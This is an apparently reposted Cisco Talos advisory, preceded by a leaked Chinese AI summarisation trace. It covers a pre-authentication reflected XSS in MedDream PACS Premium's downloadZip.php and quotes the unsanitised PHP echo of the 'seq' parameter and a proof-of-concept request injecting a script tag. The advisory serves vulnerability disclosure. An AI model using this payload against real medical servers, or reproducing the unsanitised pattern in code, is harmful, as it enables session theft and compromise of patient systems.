嗯,用户让我帮忙总结一篇文章的内容,控制在100个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。 首先,我需要仔细阅读这篇文章。看起来是关于MedDream PACS Premium 7.3.6.870版本中的一个反射型跨站脚本(XSS)漏洞。漏洞存在于downloadZip功能中,攻击者可以通过构造恶意URL触发这个漏洞,导致任意JavaScript代码执行。 接下来,我需要提取关键信息:产品名称、漏洞类型、影响版本、CVSS评分以及修复情况。这些信息对于用户来说应该是最重要的。 然后,我要确保总结控制在100字以内。这意味着要简洁明了,避免冗余信息。同时,不需要使用特定的开头语句,直接进入描述。 最后,检查一下是否有遗漏的重要点。比如漏洞的发现者和时间线可能不必要,但产品名称和版本必须包含进去。 总结一下:MedDream PACS Premium 7.3.6.870版本存在反射型XSS漏洞,攻击者利用恶意URL可执行任意JavaScript代码。CVSSv3评分为6.1,已修复。 </think> MedDream PACS Premium 7.3.6.870版本存在反射型跨站脚本(XSS)漏洞,攻击者通过构造恶意URL可执行任意JavaScript代码。该漏洞影响下载功能中的seq参数处理。CVSSv3评分为6.1,已修复。 2026-1-20 00:0:33 Author: talosintelligence.com(查看原文) 阅读量:0 收藏
SUMMARY
A reflected cross-site scripting (xss) vulnerability exists in the downloadZip functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious url can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
PRODUCT URLS
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
CVSSv3 SCORE
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
DETAILS
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
A pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/downloadZip.php script.
The value of the seq parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
$seq = $_GET['seq']; /// [1]
if (!isset($_SESSION["downloadFilename-$seq"]) || !isset($_SESSION["downloadPath-$seq"]))
die("Download sequence [$seq] not found!"); //// [2]
The $seq variable is set by the attacker and is fully controllable [1], if there is no file name entry in SESSION table with the $seq value, an error message is displayed in a form on html code [2].
Example of a malicious request and response containing injected HTML/JavaScript code:
GET /Pacs/downloadZip.php?seq=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 15:49:14 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 56
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Download sequence [<script>alert(1)</script>] not found!
TIMELINE
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.
如有侵权请联系:admin#unsafe.sh